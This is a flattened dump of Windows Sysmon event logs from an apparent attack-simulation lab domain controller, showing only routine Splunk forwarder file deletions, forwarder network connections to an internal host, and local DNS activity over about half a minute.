23542300x80000000000000002201599Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:21.903{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=683273F1EA53ED7EC0BED36615C58EB1,SHA256=4D920B617821685F09E4A5EF93C53F3A8399EF8BF988E021A4D3BE9274CFBA2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201602Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:22.965{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA93C7A0F8FDFF41626B68A7E4C844E5,SHA256=E1B1A967DCBDA82B82B05D90FBE6800FDF1DFAD56C4FDA30C4F978BCC48F1429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201601Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:22.200{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1C8861730FC910A08EDC73DC8D223F6C,SHA256=9C2841FF3D73FF557120B9E8F9F43067D1BB7890F7C07E46BDC53507E82AD9FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201600Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.036{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55227-false10.0.1.12-8000- 23542300x80000000000000002201603Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:23.997{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6CDB0F7876B63AECE707E7C430E1289,SHA256=ABA6903D58A66C974C41C01FBAD96E7C73504C31559809B19C0D767478F27F97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201606Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:25.450{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2F4019C75D6CE34D340ABE1D381559B,SHA256=1203B383E81F69C7533AEA7A2A95AAC321EE67139F4EBA7F0C1A9BFD6CF30E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201605Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:25.450{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA3174451441DEE97E71D5592FA88458,SHA256=DA2CAFBE185B1DC6B47A51B5B0DAA3DF9D922C352362C7FD077A59AFD2732998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201604Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:25.043{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A79113DFD9C57EBC264A876A8BC0F15,SHA256=102B4DEACF71819CA8CF7308E33757F51CA086C4915D66DC0C884CCCF29E6C9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201608Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:22.083{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55228-false10.0.1.12-8000- 23542300x80000000000000002201607Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:26.059{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1E7C8E19CF5293A8639623A4886B595,SHA256=3A57017285D1B604B72C87673BC3E5CCD4C471A37D1DF5275C84B3ECDCC3B155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201609Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:27.090{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3A88B51B8D034F91E45E6A135B2121,SHA256=043300AC1FCF3868CE96F6DC67396F7965C88185FB601B0330B1619A788C0E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201610Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:28.106{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247126B016FD496559566ED8993B6AE8,SHA256=1CB591ED1369D83C03731742D5BC843F7A6C243002D7803E6F1F9FA08B305A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201612Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:29.137{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2F4019C75D6CE34D340ABE1D381559B,SHA256=1203B383E81F69C7533AEA7A2A95AAC321EE67139F4EBA7F0C1A9BFD6CF30E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201611Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:29.122{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D0CD559C6CED3453422CE600B97BC7,SHA256=D93A5A61BB816AE419A57A4B121537205E16C19B997C1E18B008C762006DC7AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201613Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:30.153{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5341B91910EE971F2A7DC12167A156,SHA256=E16BF92309C45C51C48EAAE9CAC0F1F3BEF8F101CB2727D919472BA089E5E086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201615Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:31.278{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67494E3BF0BBB0FDD01013706B6EFD5D,SHA256=EB108ACC7448B762386835B25337E4FED57AF160E6779E6E9EA8D6D39A2DD4DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201614Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:31.200{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D74D969296FE25DB0B3E14F0764B2E2E,SHA256=A8324E50550FE02D8395ECCA24FF255E7FF334954FE6DF915C570E47CA544157,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201617Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:27.895{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55229-false10.0.1.12-8000- 23542300x80000000000000002201616Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:32.200{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA961F6BF60447CE54ED5D5DC29E452,SHA256=7C968001A21C5E14D957855D2AB5545DF4A4D067BF85730F5B7BA4666D4703BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201619Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:33.231{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EC31AB979A437714A8546BDD748A333,SHA256=27292B871574467B98E1F54840C95576A992922A0999AA291A0D29C0F542D029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201618Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:33.215{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80FC5BB0B4D1B554BE508BC8778028BE,SHA256=A671D14FACA8978E4A990C6E3CC3E09C21C2B52183C99EC8FCDD9966F1F108AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201620Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:34.231{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9A1CC3DA31CA5ECBF33672754812714,SHA256=DA8B938C2277DF44D666D3FA727CA0F10003C1BBFC2AE32DC142EECC535F131F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201621Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:35.278{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0AF02F572A6FE9F746FD35401994C57,SHA256=C6D763EC0E7799A063458E6C347F3DC24606064EFD3C0B232EBB388CB0EC375A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201624Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:32.911{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55231-false10.0.1.12-8000- 23542300x80000000000000002201623Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:36.309{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24DC6282546960C2D05C25856CDED8E6,SHA256=4903218B90A66A34CD1BE212156400F70B4CAC67AB0997E8486F1FACEB8CCE7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201622Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:36.168{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=801FEADC9F58603E805AFDF7F2E55B63,SHA256=378886C1B0835180D926F245A0234196994949CA4E2247380C48A583EF1F849F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201625Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:37.309{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF72CF10B4B43B79E1E0A57C49EBD90,SHA256=886DEC681C3341B23B4D11F381809817EAB1E6C77117426DA92EE8F30C19E431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201626Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:38.309{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2535C0B33EADB027C53B9AC32780D1F3,SHA256=7BF99A8AC25E6EB1243E71BF0876289E1D290EC66A59C045AC0E114409A6E1EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201627Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:39.340{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4C25220FC1E63BC6A4E6628DC0561FE,SHA256=C38AA4C47B62664D2F7A426E2A88F858D7B1867DAFEAAD222746409D50258678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201628Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:40.340{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2163CE816782A1921B61966BD705EF,SHA256=32E7635DE18719E60887EE48F5F29F4518F575B2AB211E3DE9726ED333C636CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201632Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:37.958{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55232-false10.0.1.12-8000- 23542300x80000000000000002201631Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:41.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB63708311B06A92385DEDD1D2C4ACDA,SHA256=BEEDC00DFEB186ABE86A2B01EC4C7B75CA3135E9C659B061013E9FB8E89310C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201630Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:41.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=647DBFAE3A86C399408C3D8FDEAE6AAD,SHA256=A0A837231B4A8F65BD49BE25ED6BF87613AF175488C5968C9AA18CFDEAD1AEB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201629Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:41.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CF61A1A8048AFB29D27DA073FD0BB03,SHA256=28D99FD718D6C14967CAF83246EA671CB0FA906D1573EE56F1D4AEC7AA66457B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201633Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:42.418{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E98FF9B6EC01E1AFF456914C3A830B,SHA256=DEB9AB44D78398D98F0CFD8C68A21DBA6FBFB6C2B88D79C60EDD8E0829DFA690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201634Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:43.434{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65670C9776411391BB5BD17288916DD4,SHA256=4FD8529938885D880BC481566F5553F6CAC73EE8D68CF5AB8902099C3DE9A86B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201635Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:44.450{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4B50B996E0AB7C3B498DF2E2546CD00,SHA256=8F8919CB02050230DBBD7FEE56ED2DDC6D9252BD7FC6284EA0C1676B8E3FC9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201636Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:45.512{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=016DCCEBC818245AFA9DF67F20DE8F88,SHA256=68F8629752465F72CF42C05419D3622713A047B4CEE65D11844923F20CC67F31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201638Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:46.606{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F66F6859B39909D7F1DF30D678C604E9,SHA256=3B1ED1A27B0E85293F1454758B550B503221DA201E7C501A60FEB03D32FD0115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201637Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:46.168{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB63708311B06A92385DEDD1D2C4ACDA,SHA256=BEEDC00DFEB186ABE86A2B01EC4C7B75CA3135E9C659B061013E9FB8E89310C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201640Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:43.004{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55233-false10.0.1.12-8000- 23542300x80000000000000002201639Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:47.621{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D504485351318017E7285F51C6893774,SHA256=8C6E69EEFDEBB087FC043E727D99E87A1DFA8526E26479310E90D4E9043F7AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201641Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:48.621{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921D372366B6D3A1793FF8277EAFD284,SHA256=F0EF8D21D2F8E3FB3DDEFE687020E3283D07173D93DAE24FBEAE24D5FFB5ACAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201642Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:49.731{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AFA35B903754E9CC9F9BAA899E678B9,SHA256=5549B59C1EBF20D62C0FE0828D3B0ED8DC22B8827FD48C96EA023AC8E10E11E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201644Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:50.981{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA9F725713583562F7320F89C4FB6DAE,SHA256=8C92681E03658EE3BF98F604B8B6876CBF57462A1BC5BB934E222E2B110F29AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201643Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:50.981{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F572BCE0EFF384C3D9C5E9EB394E8AB7,SHA256=FC190D3F98F473874CCABFA9228DC8C9D7463CC2D187E14F073D0573E9CABB55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201647Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:51.996{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD8251D21B215C51BA858405F2BC632,SHA256=2F589FFD04117F57945B020DB99C4252CC32D8D77ABB9BB8701EA9FA1686A939,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201646Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:48.036{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55234-false10.0.1.12-8000- 354300x80000000000000002201645Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:47.661{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62334- 354300x80000000000000002201648Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:48.660{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62334- 23542300x80000000000000002201649Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:53.106{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E502D7A58D17457F43F2F8D876952A,SHA256=D0D4F1D4EAA7B8BAE8E622C149C6258992D9E7FE7320ED4DA51BFC6B6DBD359F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201650Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:54.106{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C5E892E5CA664B11DEFB23B5FA2554D,SHA256=C9BAD863D600D0AA33B085A33B55B4DA43407195B8A13BA7F28AAF6C729CADA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201651Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:55.137{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEA3C18C2519B2E02FA2AF7DB74144B,SHA256=8E71E7DA83FAF7AB077C52E5EB5099B42C2402E2B870D12F3BF60A7861C72528,IMPHASH=00000000000000000000000000000000falsetrue 